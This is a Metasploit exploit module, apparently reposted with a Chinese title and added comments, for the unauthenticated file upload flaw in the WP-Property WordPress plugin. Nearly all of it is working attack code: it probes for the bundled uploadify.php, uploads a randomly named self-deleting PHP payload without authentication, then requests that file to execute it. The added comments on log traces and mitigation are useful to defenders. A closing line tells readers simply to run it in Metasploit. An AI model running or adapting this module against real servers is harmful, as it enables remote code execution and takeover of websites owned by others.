WordPress WP-Property PHP 文件上传漏洞
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

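require 'msf/core'
require 'msf/core/exploit/php_exe'

# Metasploit module for the unauthenticated file upload in the WP-Property
# WordPress plugin (versions <= 1.35.0 according to the module description).
#
# The listing was recovered from a paste with filler characters scattered
# through it; the second mixin name had been reduced to "Msf::Exploit: hpEXE"
# and is restored to Msf::Exploit::PhpEXE, which the required
# 'msf/core/exploit/php_exe' file provides.
#
# What the module leaves in a web server's logs, as visible from the requests
# it builds below:
#   * a POST to wp-content/plugins/wp-property/third-party/uploadify/uploadify.php
#     with a multipart body carrying a "Filedata" part and a "folder" part;
#   * a following GET for a five-letter, randomly named .php file.
#
# Mitigation on the server side: update the plugin past the affected range,
# remove or block direct access to the bundled uploadify.php, and deny PHP
# execution in directories that accept uploads.
class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::PhpEXE

  # Registers module metadata (name, references, targets) and the single
  # TARGETURI option that points at the WordPress base path.
  #
  # @param info [Hash] metadata passed in by the framework and merged by update_info
  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'WordPress WP-Property PHP File Upload Vulnerability',
      'Description'    => %q{
          This module exploits a vulnerability found in WP-Property <= 1.35.0 WordPress
        plugin. By abusing the uploadify.php file, a malicious user can upload a file to a
        temp directory without authentication, which results in arbitrary code execution.
      },
      'Author'         =>
        [
          'Sammy FORGIT', # initial discovery
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          [ 'OSVDB', '82656' ],
          [ 'BID', '53787' ],
          [ 'EDB', '18987'],
          [ 'URL', 'http://www.opensyscom.fr/Actualites/wordpress-plugins-wp-property-shell-upload-vulnerability.html' ]
        ],
      'Payload'        =>
        {
          'BadChars' => "\x00",
        },
      'Platform'       => 'php',
      'Arch'           => ARCH_PHP,
      'Targets'        =>
        [
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Mar 26 2012'))

    register_options(
      [
        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
      ], self.class)
  end

  # Probes for the bundled uploadify.php script with a single GET request.
  #
  # NOTE(review): the only signal used is the HTTP status code. A 200 shows the
  # script is reachable, not that the installed plugin version is in the
  # affected range, so "Appears" is a weak result; no plugin version is read.
  #
  # @return [Exploit::CheckCode::Unknown] when there is no response or the status is not 200
  # @return [Exploit::CheckCode::Appears] when the script answers with 200
  def check
    uri = target_uri.path
    # Make sure the base path ends in a slash before the plugin path is appended.
    uri << '/' if uri[-1,1] != '/'

    res = send_request_cgi({
      'method' => 'GET',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php"
    })

    if not res or res.code != 200
      return Exploit::CheckCode::Unknown
    end

    return Exploit::CheckCode::Appears
  end

  # Uploads a PHP payload through uploadify.php and then requests it.
  #
  # Steps, as written below:
  #   1. build a multipart form with a "Filedata" part (the payload, under a
  #      random five-letter .php name) and a "folder" part naming the uploadify
  #      directory;
  #   2. POST the form to uploadify.php without any authentication data;
  #   3. treat the upload as failed unless the reply is a 200 whose body
  #      contains the generated file name;
  #   4. GET the path returned in the reply body.
  #
  # The payload is built with :unlink_self => true; presumably the dropped file
  # removes itself once it runs, so its absence on disk afterwards does not
  # rule out a compromise (confirm against the PhpEXE mixin).
  #
  # @raise via fail_with(Exploit::Failure::UnexpectedReply) when the upload reply is not as expected
  def exploit
    uri = target_uri.path
    uri << '/' if uri[-1,1] != '/'

    peer = "#{rhost}:#{rport}"

    @payload_name = "#{rand_text_alpha(5)}.php"
    php_payload = get_write_exec_payload(:unlink_self=>true)

    data = Rex::MIME::Message.new
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{@payload_name}\"")
    data.add_part("#{uri}wp-content/plugins/wp-property/third-party/uploadify/", nil, nil, "form-data; name=\"folder\"")
    # Drops the CRLF that precedes a boundary marker at the start of a line in
    # the serialized message; the reason is not stated in the listing.
    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')

    print_status("#{peer} - Uploading payload #{@payload_name}")
    res = send_request_cgi({
      'method' => 'POST',
      'uri'    => "#{uri}wp-content/plugins/wp-property/third-party/uploadify/uploadify.php",
      'ctype'  => "multipart/form-data; boundary=#{data.bound}",
      'data'   => post_data
    })

    if not res or res.code != 200 or res.body !~ /#{@payload_name}/
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
    end

    # The reply body is used verbatim as the URI of the uploaded file.
    upload_uri = res.body

    print_status("#{peer} - Executing payload #{@payload_name}")
    res = send_request_raw({
      'uri'    => upload_uri,
      'method' => 'GET'
    })
  end
end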
不要问我这写的是什么 怎么利用 我是说msf.